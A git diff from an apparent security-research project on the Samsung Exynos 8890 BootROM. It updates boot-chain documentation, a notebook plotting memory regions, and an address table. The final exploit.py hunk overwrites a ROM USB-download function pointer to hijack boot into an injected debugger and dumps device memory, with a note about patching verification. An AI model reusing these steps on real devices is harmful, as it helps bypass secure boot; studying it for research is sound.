diff --git a/documentation/exynos_exploit_chain.odg b/documentation/exynos_exploit_chain.odg index 7e31434..01205f5 100644 Binary files a/documentation/exynos_exploit_chain.odg and b/documentation/exynos_exploit_chain.odg differ diff --git a/documentation/source/BootROM_8890/boot_chain.rst b/documentation/source/BootROM_8890/boot_chain.rst index 6084f58..5920ab3 100644 --- a/documentation/source/BootROM_8890/boot_chain.rst +++ b/documentation/source/BootROM_8890/boot_chain.rst @@ -77,7 +77,7 @@ This results in the following files: After loading the stage1 (entry.S - Frederic's exploit), we're allowed to send custom payloads to the device. The first payload that is then sent, is the debugger. -debugger +Debugger -------- The initial debugger is written to ``0x2069000``, with debugger_stack and _storage at ``0x0206b000`` and ``0x0206d000`` respectively. @@ -179,7 +179,7 @@ After authentication the bootROM jumps to this function at, we can execute this jump_fwbl1() -BL1 is laoded at the download buffer and self copies to ``0x02024000`` and resumes execution there (``0x02024010``). +BL1 is loaded at the download buffer and self copies to ``0x02022000`` and resumes execution there (``0x02024010``), with a size of 0x2000 (0x02022000 to 0x02024000). However, this does not result in a jump back to the debugger. But the ROM still allows receival of one data package from the USB host (this is likely the system 'waiting' to receive the bootloader). diff --git a/documentation/source/_ignore/draw_boot.ipynb b/documentation/source/_ignore/draw_boot.ipynb index 6641930..68d8370 100644 --- a/documentation/source/_ignore/draw_boot.ipynb +++ b/documentation/source/_ignore/draw_boot.ipynb @@ -2,7 +2,7 @@ "cells": [ { "cell_type": "code", - "execution_count": 180, + "execution_count": 371, "metadata": {}, "outputs": [], "source": [ @@ -20,7 +20,7 @@ }, { "cell_type": "code", - "execution_count": 197, + "execution_count": 372, "metadata": {}, "outputs": [ { @@ -49,9 +49,9 @@ " name\n", " order\n", " comment\n", + " size\n", " overlap\n", " overlap_with\n", - " size\n", " \n", " \n", " \n", @@ -62,140 +62,166 @@ " BootROM\n", " NaN\n", " NaN\n", + " 131072\n", " True\n", " 0.0\n", - " 131072\n", " \n", " \n", " 1\n", " 704\n", - " 21184\n", - " BL1 boot entry point\n", - " ENTRY\n", + " 708\n", + " _jump_bl1\n", " NaN\n", + " NaN\n", + " 4\n", " True\n", " 0.0\n", - " 20480\n", " \n", " \n", " 2\n", " 25824\n", - " 46304\n", - " Boot USB function\n", + " 25996\n", + " _boot_usb\n", " NaN\n", " NaN\n", + " 172\n", " True\n", " 0.0\n", - " 20480\n", " \n", " \n", " 3\n", " 75848\n", - " 96328\n", - " bootrom authentication function\n", + " 76008\n", + " auth_bl1\n", " NaN\n", " NaN\n", + " 160\n", " True\n", " 0.0\n", - " 20480\n", " \n", " \n", " 4\n", - " 103184\n", - " 123664\n", - " BL1 boot function\n", + " 33689440\n", + " 33689448\n", + " _boot_usb_ra\n", " NaN\n", " NaN\n", - " True\n", - " 0.0\n", - " 20480\n", + " 8\n", + " False\n", + " 4.0\n", " \n", " \n", " 5\n", - " 2146304\n", - " 2166784\n", - " Frederic Destination pointer\n", + " 33693696\n", + " 33701888\n", + " BL1\n", " NaN\n", " NaN\n", + " 8192\n", " False\n", " 5.0\n", - " 20480\n", " \n", " \n", " 6\n", - " 33689440\n", - " 33689448\n", - " Boot USB return address\n", + " 33701888\n", + " 33849344\n", + " BL31\n", " NaN\n", " NaN\n", + " 147456\n", " False\n", " 6.0\n", - " 8\n", " \n", " \n", " 7\n", - " 33691000\n", - " 33711480\n", - " Event buffer pointer\n", + " 33849344\n", + " 34008336\n", + " BL2\n", " NaN\n", " NaN\n", - " False\n", + " 158992\n", + " True\n", " 7.0\n", - " 20480\n", " \n", " \n", " 8\n", " 33984512\n", - " 34004992\n", - " First debugger location\n", + " 34009088\n", + " Debugger\n", " NaN\n", " NaN\n", + " 24576\n", " True\n", - " 9.0\n", - " 20480\n", + " 7.0\n", " \n", " \n", " 9\n", - " 33992704\n", + " 34008336\n", " 34013184\n", - " End of memory stack\n", + " End of readable memory space in buffer\n", " NaN\n", " NaN\n", + " 4848\n", " True\n", " 8.0\n", - " 20480\n", + " \n", + " \n", + " 10\n", + " 34340864\n", + " 34369536\n", + " Debugger relocated\n", + " NaN\n", + " NaN\n", + " 28672\n", + " True\n", + " 10.0\n", + " \n", + " \n", + " 11\n", + " 34340864\n", + " 34340868\n", + " _frederic_dest_ptr\n", + " NaN\n", + " NaN\n", + " 4\n", + " True\n", + " 10.0\n", " \n", " \n", "\n", "" ], "text/plain": [ - " start end name order comment \\\n", - "0 0 131072 BootROM NaN NaN \n", - "1 704 21184 BL1 boot entry point ENTRY NaN \n", - "2 25824 46304 Boot USB function NaN NaN \n", - "3 75848 96328 bootrom authentication function NaN NaN \n", - "4 103184 123664 BL1 boot function NaN NaN \n", - "5 2146304 2166784 Frederic Destination pointer NaN NaN \n", - "6 33689440 33689448 Boot USB return address NaN NaN \n", - "7 33691000 33711480 Event buffer pointer NaN NaN \n", - "8 33984512 34004992 First debugger location NaN NaN \n", - "9 33992704 34013184 End of memory stack NaN NaN \n", + " start end name order \\\n", + "0 0 131072 BootROM NaN \n", + "1 704 708 _jump_bl1 NaN \n", + "2 25824 25996 _boot_usb NaN \n", + "3 75848 76008 auth_bl1 NaN \n", + "4 33689440 33689448 _boot_usb_ra NaN \n", + "5 33693696 33701888 BL1 NaN \n", + "6 33701888 33849344 BL31 NaN \n", + "7 33849344 34008336 BL2 NaN \n", + "8 33984512 34009088 Debugger NaN \n", + "9 34008336 34013184 End of readable memory space in buffer NaN \n", + "10 34340864 34369536 Debugger relocated NaN \n", + "11 34340864 34340868 _frederic_dest_ptr NaN \n", "\n", - " overlap overlap_with size \n", - "0 True 0.0 131072 \n", - "1 True 0.0 20480 \n", - "2 True 0.0 20480 \n", - "3 True 0.0 20480 \n", - "4 True 0.0 20480 \n", - "5 False 5.0 20480 \n", - "6 False 6.0 8 \n", - "7 False 7.0 20480 \n", - "8 True 9.0 20480 \n", - "9 True 8.0 20480 " + " comment size overlap overlap_with \n", + "0 NaN 131072 True 0.0 \n", + "1 NaN 4 True 0.0 \n", + "2 NaN 172 True 0.0 \n", + "3 NaN 160 True 0.0 \n", + "4 NaN 8 False 4.0 \n", + "5 NaN 8192 False 5.0 \n", + "6 NaN 147456 False 6.0 \n", + "7 NaN 158992 True 7.0 \n", + "8 NaN 24576 True 7.0 \n", + "9 NaN 4848 True 8.0 \n", + "10 NaN 28672 True 10.0 \n", + "11 NaN 4 True 10.0 " ] }, - "execution_count": 197, + "execution_count": 372, "metadata": {}, "output_type": "execute_result" } @@ -213,17 +239,22 @@ " except ValueError:\n", " return value \n", "\n", - "data.sort_values(by=['start'], inplace=True)\n", "data['start'] = data['start'].apply(convert_to_int)\n", "data['end'] = data['end'].apply(convert_to_int)\n", + "data['size'] = data['end'] - data['start']\n", + "\n", + "data.sort_values(by=['size'], inplace=True, ascending=False)\n", + "data.sort_values(by=['start'], inplace=True)\n", + "data.reset_index(drop=True, inplace=True)\n", + "\n", "data['overlap'] = False\n", "\n", "for i, row in data.iterrows():\n", " for j, row2 in data.iterrows():\n", " if i == j:\n", " continue\n", - " if row['start'] < row2['end'] and row['end'] > row2['start']:\n", - " if row['end'] - row['start'] > row2['end'] - row2['start']:\n", + " if row['start'] <= row2['end'] and row['end'] > row2['start']:\n", + " if row['end'] - row['start'] >= row2['end'] - row2['start']:\n", " continue\n", " data.at[i, 'overlap'] = True\n", " data.at[j, 'overlap'] = True\n", @@ -231,31 +262,14 @@ "\n", "data['overlap_with'] = data['overlap_with'].fillna(data.index.to_series())\n", "data['overlap_with'] = data['overlap_with'].astype(float)\n", - "data['size'] = data['end'] - data['start']\n", + "\n", + "# Send warnings if sizes are negative\n", + "if (data['size'] < 0).any():\n", + " print(f'Warning: Negative sizes detected at indices {data[data[\"size\"] < 0].index}')\n", "\n", "data" ] }, - { - "cell_type": "code", - "execution_count": 239, - "metadata": {}, - "outputs": [ - { - "data": { - "text/plain": [ - "np.int64(34013184)" - ] - }, - "execution_count": 239, - "metadata": {}, - "output_type": "execute_result" - } - ], - "source": [ - "data['end'].iloc[-1]" - ] - }, { "cell_type": "markdown", "metadata": {}, @@ -265,32 +279,9 @@ }, { "cell_type": "code", - "execution_count": 242, + "execution_count": 373, "metadata": {}, "outputs": [ - { - "name": "stdout", - "output_type": "stream", - "text": [ - "8.0\n", - "1.25\n", - "1.25\n", - "1.25\n", - "1.25\n", - "inf\n", - "inf\n" - ] - }, - { - "name": "stderr", - "output_type": "stream", - "text": [ - "/tmp/ipykernel_16763/1983735317.py:29: RuntimeWarning:\n", - "\n", - "divide by zero encountered in scalar divide\n", - "\n" - ] - }, { "data": { "application/vnd.plotly.v1+json": { @@ -300,7 +291,7 @@ "data": [ { "marker": { - "color": "#ce2c3c" + "color": "#856446" }, "mode": "text", "name": "BootROM", @@ -308,7 +299,7 @@ "textposition": "middle center", "type": "scatter", "x": [ - 2 + 2.5 ], "y": [ 0.5 @@ -316,15 +307,47 @@ }, { "marker": { - "color": "#ee6511" + "color": "#856446" }, "mode": "text", - "name": "BL1 boot entry point", - "text": "BL1 boot entry point", + "showlegend": false, + "text": "0x20000", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.1400000000000001 + ], + "y": [ + 3.84 + ] + }, + { + "marker": { + "color": "#856446" + }, + "mode": "text", + "showlegend": false, + "text": "0x0", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.1400000000000001 + ], + "y": [ + 0.14 + ] + }, + { + "marker": { + "color": "#82f92f" + }, + "mode": "text", + "name": "_jump_bl1", + "text": "_jump_bl1", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 1.52 @@ -332,15 +355,47 @@ }, { "marker": { - "color": "#157424" + "color": "#82f92f" }, "mode": "text", - "name": "Boot USB function", - "text": "Boot USB function", + "showlegend": false, + "text": "0x2c4", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.2400000000000002 + ], + "y": [ + 1.7100000000000002 + ] + }, + { + "marker": { + "color": "#82f92f" + }, + "mode": "text", + "showlegend": false, + "text": "0x2c0", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 1.1600000000000001 + ] + }, + { + "marker": { + "color": "#bd73ad" + }, + "mode": "text", + "name": "_boot_usb", + "text": "_boot_usb", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 2.52 @@ -348,15 +403,47 @@ }, { "marker": { - "color": "#879ab3" + "color": "#bd73ad" }, "mode": "text", - "name": "bootrom authentication function", - "text": "bootrom authentication function", + "showlegend": false, + "text": "0x658c", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.2400000000000002 + ], + "y": [ + 2.71 + ] + }, + { + "marker": { + "color": "#bd73ad" + }, + "mode": "text", + "showlegend": false, + "text": "0x64e0", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 2.16 + ] + }, + { + "marker": { + "color": "#7e8007" + }, + "mode": "text", + "name": "auth_bl1", + "text": "auth_bl1", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 3.52 @@ -364,31 +451,95 @@ }, { "marker": { - "color": "#a4cd2c" + "color": "#7e8007" }, "mode": "text", - "name": "BL1 boot function", - "text": "BL1 boot function", + "showlegend": false, + "text": "0x128e8", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.2400000000000002 ], "y": [ - 4.52 + 3.71 ] }, { "marker": { - "color": "#1b44e8" + "color": "#7e8007" }, "mode": "text", - "name": "Frederic Destination pointer", - "text": "Frederic Destination pointer", + "showlegend": false, + "text": "0x12848", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.2400000000000002 + ], + "y": [ + 3.16 + ] + }, + { + "marker": { + "color": "#7c5233" + }, + "mode": "text", + "name": "_boot_usb_ra", + "text": "_boot_usb_ra", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 4.5 + ] + }, + { + "marker": { + "color": "#7c5233" + }, + "mode": "text", + "showlegend": false, + "text": "0x2020f68", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 4.84 + ] + }, + { + "marker": { + "color": "#7c5233" + }, + "mode": "text", + "showlegend": false, + "text": "0x2020f60", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 4.14 + ] + }, + { + "marker": { + "color": "#6f6733" + }, + "mode": "text", + "name": "BL1", + "text": "BL1", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 5.5 @@ -396,15 +547,47 @@ }, { "marker": { - "color": "#8be123" + "color": "#6f6733" }, "mode": "text", - "name": "Boot USB return address", - "text": "Boot USB return address", + "showlegend": false, + "text": "0x2024000", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.2400000000000002 + ], + "y": [ + 5.84 + ] + }, + { + "marker": { + "color": "#6f6733" + }, + "mode": "text", + "showlegend": false, + "text": "0x2022000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 5.14 + ] + }, + { + "marker": { + "color": "#86ce48" + }, + "mode": "text", + "name": "BL31", + "text": "BL31", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 6.5 @@ -412,15 +595,47 @@ }, { "marker": { - "color": "#d82002" + "color": "#86ce48" }, "mode": "text", - "name": "Event buffer pointer", - "text": "Event buffer pointer", + "showlegend": false, + "text": "0x2048000", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.2400000000000002 + ], + "y": [ + 6.84 + ] + }, + { + "marker": { + "color": "#86ce48" + }, + "mode": "text", + "showlegend": false, + "text": "0x2024000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 6.14 + ] + }, + { + "marker": { + "color": "#de3ae2" + }, + "mode": "text", + "name": "BL2", + "text": "BL2", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 7.5 @@ -428,15 +643,47 @@ }, { "marker": { - "color": "#b60e34" + "color": "#de3ae2" }, "mode": "text", - "name": "First debugger location", - "text": "First debugger location", + "showlegend": false, + "text": "0x206ed10", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.1400000000000001 + ], + "y": [ + 8.34 + ] + }, + { + "marker": { + "color": "#de3ae2" + }, + "mode": "text", + "showlegend": false, + "text": "0x2048000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.1400000000000001 + ], + "y": [ + 7.14 + ] + }, + { + "marker": { + "color": "#292d88" + }, + "mode": "text", + "name": "Debugger", + "text": "Debugger", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 8.52 @@ -444,19 +691,179 @@ }, { "marker": { - "color": "#4c0da0" + "color": "#292d88" }, "mode": "text", - "name": "End of memory stack", - "text": "End of memory stack", + "showlegend": false, + "text": "0x206f000", "textposition": "middle center", "type": "scatter", "x": [ - 2 + 1.2400000000000002 + ], + "y": [ + 8.709999999999999 + ] + }, + { + "marker": { + "color": "#292d88" + }, + "mode": "text", + "showlegend": false, + "text": "0x2069000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 8.16 + ] + }, + { + "marker": { + "color": "#5d64be" + }, + "mode": "text", + "name": "End of readable memory space in buffer", + "text": "End of readable memory space in buffer", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 ], "y": [ 9.52 ] + }, + { + "marker": { + "color": "#5d64be" + }, + "mode": "text", + "showlegend": false, + "text": "0x2070000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 9.709999999999999 + ] + }, + { + "marker": { + "color": "#5d64be" + }, + "mode": "text", + "showlegend": false, + "text": "0x206ed10", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 9.16 + ] + }, + { + "marker": { + "color": "#1db55c" + }, + "mode": "text", + "name": "Debugger relocated", + "text": "Debugger relocated", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 10.5 + ] + }, + { + "marker": { + "color": "#1db55c" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c7000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.1400000000000001 + ], + "y": [ + 11.84 + ] + }, + { + "marker": { + "color": "#1db55c" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c0000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.1400000000000001 + ], + "y": [ + 10.14 + ] + }, + { + "marker": { + "color": "#3d7e32" + }, + "mode": "text", + "name": "_frederic_dest_ptr", + "text": "_frederic_dest_ptr", + "textposition": "middle center", + "type": "scatter", + "x": [ + 2.5 + ], + "y": [ + 11.52 + ] + }, + { + "marker": { + "color": "#3d7e32" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c0004", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 11.709999999999999 + ] + }, + { + "marker": { + "color": "#3d7e32" + }, + "mode": "text", + "showlegend": false, + "text": "0x20c0000", + "textposition": "middle center", + "type": "scatter", + "x": [ + 1.2400000000000002 + ], + "y": [ + 11.16 + ] } ], "layout": { @@ -478,7 +885,7 @@ }, "shapes": [ { - "fillcolor": "#ce2c3c", + "fillcolor": "#856446", "layer": "below", "line": { "width": 2 @@ -486,51 +893,12 @@ "opacity": 0.5, "type": "rect", "x0": 0.9, - "x1": 3.1, - "y0": 0.05, - "y1": 4.95 - }, - { - "fillcolor": "#ee6511", - "layer": "below", - "line": { - "width": 2 - }, - "opacity": 0.5, - "type": "rect", - "x0": 1, - "x1": 3, - "y0": 1.07, - "y1": 1.92 - }, - { - "fillcolor": "#157424", - "layer": "below", - "line": { - "width": 2 - }, - "opacity": 0.5, - "type": "rect", - "x0": 1, - "x1": 3, - "y0": 2.07, - "y1": 2.92 - }, - { - "fillcolor": "#879ab3", - "layer": "below", - "line": { - "width": 2 - }, - "opacity": 0.5, - "type": "rect", - "x0": 1, - "x1": 3, - "y0": 3.07, + "x1": 4.1, + "y0": 0.08, "y1": 3.92 }, { - "fillcolor": "#a4cd2c", + "fillcolor": "#82f92f", "layer": "below", "line": { "width": 2 @@ -538,12 +906,51 @@ "opacity": 0.5, "type": "rect", "x0": 1, - "x1": 3, - "y0": 4.069999999999999, + "x1": 4, + "y0": 1.1, + "y1": 1.79 + }, + { + "fillcolor": "#bd73ad", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 1, + "x1": 4, + "y0": 2.1, + "y1": 2.79 + }, + { + "fillcolor": "#7e8007", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 1, + "x1": 4, + "y0": 3.1, + "y1": 3.79 + }, + { + "fillcolor": "#7c5233", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 1, + "x1": 4, + "y0": 4.08, "y1": 4.92 }, { - "fillcolor": "#1b44e8", + "fillcolor": "#6f6733", "layer": "below", "line": { "width": 2 @@ -551,12 +958,12 @@ "opacity": 0.5, "type": "rect", "x0": 1, - "x1": 3, - "y0": 5.05, - "y1": 5.95 + "x1": 4, + "y0": 5.08, + "y1": 5.92 }, { - "fillcolor": "#8be123", + "fillcolor": "#86ce48", "layer": "below", "line": { "width": 2 @@ -564,25 +971,25 @@ "opacity": 0.5, "type": "rect", "x0": 1, - "x1": 3, - "y0": 6.05, - "y1": 6.95 + "x1": 4, + "y0": 6.08, + "y1": 6.92 }, { - "fillcolor": "#d82002", + "fillcolor": "#de3ae2", "layer": "below", "line": { "width": 2 }, "opacity": 0.5, "type": "rect", - "x0": 1, - "x1": 3, - "y0": 7.05, - "y1": 7.95 + "x0": 0.9, + "x1": 4.1, + "y0": 7.08, + "y1": 8.42 }, { - "fillcolor": "#b60e34", + "fillcolor": "#292d88", "layer": "below", "line": { "width": 2 @@ -590,12 +997,12 @@ "opacity": 0.5, "type": "rect", "x0": 1, - "x1": 3, - "y0": 8.07, - "y1": 8.92 + "x1": 4, + "y0": 8.1, + "y1": 8.79 }, { - "fillcolor": "#4c0da0", + "fillcolor": "#5d64be", "layer": "below", "line": { "width": 2 @@ -603,9 +1010,35 @@ "opacity": 0.5, "type": "rect", "x0": 1, - "x1": 3, - "y0": 9.07, - "y1": 9.92 + "x1": 4, + "y0": 9.1, + "y1": 9.79 + }, + { + "fillcolor": "#1db55c", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 0.9, + "x1": 4.1, + "y0": 10.08, + "y1": 11.92 + }, + { + "fillcolor": "#3d7e32", + "layer": "below", + "line": { + "width": 2 + }, + "opacity": 0.5, + "type": "rect", + "x0": 1, + "x1": 4, + "y0": 11.1, + "y1": 11.79 } ], "template": { @@ -1428,7 +1861,7 @@ "xaxis": { "range": [ 0, - 4 + 5 ], "showgrid": false, "showticklabels": false, @@ -1437,7 +1870,8 @@ 1, 2, 3, - 4 + 4, + 5 ] }, "yaxis": { @@ -1446,18 +1880,6 @@ "gridwidth": 0, "showgrid": false, "showticklabels": true, - "ticktext": [ - "0x20000
0x0", - "0x52c0
0x2c0", - "0xb4e0
0x64e0", - "0x17848
0x12848", - "0x1e310
0x19310", - "0x211000
0x20c000", - "0x2020f68
0x2020f60", - "0x2026578
0x2021578", - "0x206e000
0x2069000", - "0x2070000
0x206b000" - ], "tickvals": [ 0, 1, @@ -1468,7 +1890,9 @@ 6, 7, 8, - 9 + 9, + 10, + 11 ] } } @@ -1484,8 +1908,9 @@ "\n", "tickpointers = []\n", "vertical_len = len(data['overlap_with'].unique())\n", - "vertical_gap_percentage = 0.05\n", + "vertical_gap_percentage = 0.08\n", "horizontal_gap = 0.1\n", + "labels = pd.DataFrame()\n", "\n", "def random_color():\n", " return f'#{random.randint(0, 0xFFFFFF):06x}'\n", @@ -1497,7 +1922,7 @@ " data.at[i, 'fillcolor'] = fillcolor\n", " \n", " x0=1\n", - " x1=3\n", + " x1=4\n", "\n", " if d['overlap'] == False:\n", " y0=d['overlap_with']\n", @@ -1507,18 +1932,18 @@ "\n", " # Calculate relative size of the overlap\n", " overlap_sizes = data.loc[data['overlap_with'] == d['overlap_with']].iloc[1:]['size'].sum()\n", - " print((d['size']/overlap_sizes)*overlaps)\n", "\n", - " if d['overlap'] == i+1:\n", + " if d['overlap_with'] == i:\n", " y0=i\n", " y1=overlaps+i\n", - " if y1 == vertical_len:\n", - " y1 = vertical_len + vertical_gap_percentage\n", + " if i != data.shape[0]+1:\n", + " if d['end'] > data.iloc[i+1].start and d['end'] < data.iloc[i+1].end:\n", + " y1=overlaps+i-0.5\n", " x0=x0-horizontal_gap\n", " x1=x1+horizontal_gap\n", " else:\n", " y0=0.02+i\n", - " y1=0.97+i\n", + " y1=0.87+i\n", " else:\n", " print(f'Something went wrong with {d}. Skipping')\n", " continue\n", @@ -1527,14 +1952,15 @@ " type=\"rect\",\n", " x0=x0,\n", " x1=x1,\n", - " y0=y0+gap_percentage,\n", - " y1=y1-gap_percentage,\n", + " y0=y0+vertical_gap_percentage,\n", + " y1=y1-vertical_gap_percentage,\n", " line=dict(width=2),\n", " fillcolor=fillcolor,\n", " opacity=0.5,\n", " layer=\"below\",\n", " )\n", "\n", + " # Add middle text\n", " fig.add_trace(go.Scatter\n", " (\n", " x=[(x0+x1)/2],\n", @@ -1548,21 +1974,58 @@ " ),\n", " ))\n", "\n", + " # Add top-left text with d['end']\n", + " fig.add_trace(go.Scatter\n", + " (\n", + " x=[(x0+0.14+horizontal_gap)],\n", + " y=[y1-0.16],\n", + " text=hex(d['end']),\n", + " mode=\"text\",\n", + " textposition=\"middle center\",\n", + " marker=dict(\n", + " color=fillcolor,\n", + " ),\n", + " showlegend=False,\n", + " ))\n", + "\n", + " # Add bottom-left text with d['end']\n", + " fig.add_trace(go.Scatter\n", + " (\n", + " x=[(x0+0.14+horizontal_gap)],\n", + " y=[y0+0.14],\n", + " text=hex(d['start']),\n", + " mode=\"text\",\n", + " textposition=\"middle center\",\n", + " marker=dict(\n", + " color=fillcolor,\n", + " ),\n", + " showlegend=False,\n", + " ))\n", + "\n", "fig.update_xaxes(\n", - " range=[0, 4],\n", - " tickvals=[0, 1, 2, 3, 4],\n", + " range=[0, 5],\n", + " tickvals=[0, 1, 2, 3, 4, 5],\n", ")\n", "\n", + "start_values = data['start'].sort_values()\n", + "end_values = data['end'].sort_values()\n", + "\n", "labels = []\n", - "for i, j in zip(data['start'], data['end']):\n", - " labels.append(f'{hex(j)}
{hex(i)}')\n", + "\n", + "for i, d in data.iterrows():\n", + " if i == 0:\n", + " labels.append(f'{hex(start_values.iloc[i])}')\n", + " elif i == len(data)-1:\n", + " labels.append(f'{hex(end_values.iloc[i])}')\n", + " else:\n", + " labels.append(f'{hex(start_values.iloc[i])}
{hex(end_values.iloc[i-1])}')\n", "\n", "tickpointers = [i for i in range(len(data))]\n", "\n", "fig.update_yaxes(\n", " # tickvals=[i for i in range(len(data)+1)], \n", " tickvals = tickpointers,\n", - " ticktext= labels,\n", + " # ticktext= labels,\n", " griddash=\"longdashdot\",\n", " gridwidth=0,\n", " gridcolor=\"black\",\n", diff --git a/documentation/source/_ignore/stack_and_functions.csv b/documentation/source/_ignore/stack_and_functions.csv index 475e541..eee5c5d 100644 --- a/documentation/source/_ignore/stack_and_functions.csv +++ b/documentation/source/_ignore/stack_and_functions.csv @@ -1,11 +1,13 @@ start,end,name,order,comment -0,131072,BootROM,, -704,21184,BL1 boot entry point,ENTRY, -25824,46304,Boot USB function,, -75848,96328,bootrom authentication function,, -103184,123664,BL1 boot function,, -2146304,2166784,Frederic Destination pointer,, -33689440,33689448,Boot USB return address,, -33691000,33711480,Event buffer pointer,, -33984512,34004992,First debugger location,, -33992704,34013184,End of memory stack,, +0x00000000,0x00020000,BootROM,, +0x02020f60,0x02020f68,_boot_usb_ra,, +0x00012848,0x000128e8,auth_bl1,, +0x000064e0,0x0000658c,_boot_usb,, +0x020c0000,0x020c0004,_frederic_dest_ptr,, +0x000002c0,0x000002c4,_jump_bl1,, +0x02022000,0x02024000,BL1,, +0x02024000,0x02048000,BL31,, +0x02048000,0x0206ed10,BL2,, +0x02069000,0x0206f000,Debugger,, +0x020c0000,0x020c7000,Debugger relocated,, +0x0206ed10,0x02070000,End of readable memory space in buffer,, \ No newline at end of file diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py index 62c17b1..9efc2d9 100644 --- a/source/exploit/exploit.py +++ b/source/exploit/exploit.py @@ -306,25 +306,20 @@ class ExynosDevice(): count += 1 - def dump_memory(self, start: hex=0x0, end: hex=0x0206ffff, write=False): + def dump_memory(self, start: hex=0x0, end: hex=0x02070000, write=False): """ Dumps memory from the device. Transfer XFER_BUFFER at 0x02021800, to: 0x02020F08. End of memory at 0x0206ffff. """ - # NOT WORKING YET - transferred = ctypes.c_int() dumped = b"" # Read data from memory - for block in tqdm.tqdm(range(start, end, 0x200)): - self.usb_write(p32(block-0x200)) - res = self.usb_read(0x200) - dumped += res - - if write: - filename = f"dump_{hex(start)}_{hex(end)}_{self.target}_{datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.bin" - with open(filename, "wb") as f: - f.write(dumped) + try: + for block in tqdm.tqdm(range(start, end, 0x6000)): + dump = self.cd.memdump_region(block, 0x6000) + dumped += dump + except: + print("Error reading memory, at block: ", hex(block)) return dumped @@ -402,26 +397,6 @@ class ExynosDevice(): assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger" self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000) - def relocate_debugger_3(self): - """ - Relocate debugger to 0x0201a000, 0x0201c000, 0x0201a000 - """ - if os.getenv("USER") == "eljakim": - debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger_0x0201a000.bin", "rb").read() - else: - try: - debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read() - except Exception as e: - print(f'Are you missing your debugger? Please ensure it is present in dump/debugger_0x0201a000.bin. {e}') - sys.exit(0) - - self.cd.memwrite_region(0x020c0000, debugger_reloc) - # self.usb_write(b"FLSH") # Flush cache - self.cd.restore_stack_and_jump(0x020c0000) - assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger" - self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000) - - def dumb_interact(self, dump_imems=False): ''' Room for playing around with the debugger on the phone. @@ -599,8 +574,9 @@ class ExynosDevice(): logger.debug('State after setting up initial debugger') self.cd.arch_dbg.state.print_ctx() - # self.relocate_debugger() - DEBUGGER_ADDR = 0x2069000 #0x020c0000 + # dumped = self.dump_memory(0x20000, 0x2070000) + + DEBUGGER_ADDR = 0x2069000 ### Overwrite boot_usb_ra to our debugger self.cd.test_connection() @@ -638,13 +614,13 @@ class ExynosDevice(): # BL1 is loaded, now authenticat and patch it auth_bl1(DEBUGGER_ADDR) self.usb_write(b"FLSH") # Flush cache + hijacked_fun = u32(self.cd.memdump_region(0x020200dc, 4)) self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31 self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br")) jump_bl1(DEBUGGER_ADDR) - # ==== BL31 ==== assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger" @@ -658,45 +634,42 @@ class ExynosDevice(): time.sleep(2) self.usb_read(0x200) # GiAs + # lr = self.cd.arch_dbg.state.LR + self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)) # Resore oginal boot flow + + # TODO patch verification + + + # self.cd.memwrite_region(0x0202010c - 52, p32(GADGET_RET0)) + + + # 